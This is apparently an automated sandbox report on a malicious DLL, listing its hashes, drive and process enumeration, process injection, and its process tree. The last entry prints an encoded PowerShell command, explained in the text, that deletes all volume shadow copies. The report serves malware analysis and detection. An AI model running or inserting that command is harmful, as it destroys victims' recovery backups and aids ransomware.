Analysis
- max time kernel: 22s
- max time network: 25s
- platform: windows10-2004_x64
- resource: win10v2004-en-20220113
- submitted: 01-02-2022 12:54
Static task: static1
Behavioral task: behavioral1
- Sample: 578e1b00157447f99716b646af6b0c33d0f6c32257a19376d6cc9d003ff0fba1.dll
- Resource: win7-en-20211208
Behavioral task: behavioral2
- Sample: 578e1b00157447f99716b646af6b0c33d0f6c32257a19376d6cc9d003ff0fba1.dll
- Resource: win10v2004-en-20220113
General
- Target: 578e1b00157447f99716b646af6b0c33d0f6c32257a19376d6cc9d003ff0fba1.dll
- Size: 164KB
- MD5: 722e15d85827d3ac13e56e8108688012
- SHA1: cab935a24d7d0ea7e8d93851f7ea94ab9bccfc34
- SHA256: 578e1b00157447f99716b646af6b0c33d0f6c32257a19376d6cc9d003ff0fba1
- SHA512: 59e24cf313db4413f44f16a8276d072f43402e718c25e1d00e81ddc69a1937473cfd1902c320bc9175d75a0d43a53ab3e971b8447ec1cf9cf9aa3aa536464273
Malware Config
Signatures
- Enumerates connected drives (3 TTPs, 24 IoCs)
  Attempts to read the root path of hard drives other than the default C: drive.
  Processes: rundll32.exe
  description              ioc     process
  File opened (read-only)  \??\P:  rundll32.exe
  File opened (read-only)  \??\V:  rundll32.exe
  File opened (read-only)  \??\Z:  rundll32.exe
  File opened (read-only)  \??\H:  rundll32.exe
  File opened (read-only)  \??\J:  rundll32.exe
  File opened (read-only)  \??\M:  rundll32.exe
  File opened (read-only)  \??\N:  rundll32.exe
  File opened (read-only)  \??\O:  rundll32.exe
  File opened (read-only)  \??\A:  rundll32.exe
  File opened (read-only)  \??\E:  rundll32.exe
  File opened (read-only)  \??\Q:  rundll32.exe
  File opened (read-only)  \??\R:  rundll32.exe
  File opened (read-only)  \??\X:  rundll32.exe
  File opened (read-only)  \??\S:  rundll32.exe
  File opened (read-only)  \??\U:  rundll32.exe
  File opened (read-only)  \??\B:  rundll32.exe
  File opened (read-only)  \??\F:  rundll32.exe
  File opened (read-only)  \??\I:  rundll32.exe
  File opened (read-only)  \??\K:  rundll32.exe
  File opened (read-only)  \??\L:  rundll32.exe
  File opened (read-only)  \??\G:  rundll32.exe
  File opened (read-only)  \??\T:  rundll32.exe
  File opened (read-only)  \??\W:  rundll32.exe
  File opened (read-only)  \??\Y:  rundll32.exe
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes: rundll32.exe
  pid   process
  4200  rundll32.exe
  4200  rundll32.exe
- Suspicious use of WriteProcessMemory (5 IoCs)
  Processes: rundll32.exe, rundll32.exe
  description                       pid   process       target process
  PID 4884 wrote to memory of 4200  4884  rundll32.exe  rundll32.exe
  PID 4884 wrote to memory of 4200  4884  rundll32.exe  rundll32.exe
  PID 4884 wrote to memory of 4200  4884  rundll32.exe  rundll32.exe
  PID 4200 wrote to memory of 544   4200  rundll32.exe  powershell.exe
  PID 4200 wrote to memory of 544   4200  rundll32.exe  powershell.exe
Processes
- C:\Windows\system32\rundll32.exe
  Command line: rundll32.exe C:\Users\Admin\AppData\Local\Temp\578e1b00157447f99716b646af6b0c33d0f6c32257a19376d6cc9d003ff0fba1.dll,#1
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\rundll32.exe
    Command line: rundll32.exe C:\Users\Admin\AppData\Local\Temp\578e1b00157447f99716b646af6b0c33d0f6c32257a19376d6cc9d003ff0fba1.dll,#1
    - Enumerates connected drives
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      The -e argument is a base64-encoded UTF-16LE PowerShell command; decoded, it enumerates Win32_ShadowCopy instances via Get-WmiObject and calls Delete() on each, i.e. it removes the volume shadow copies on the host.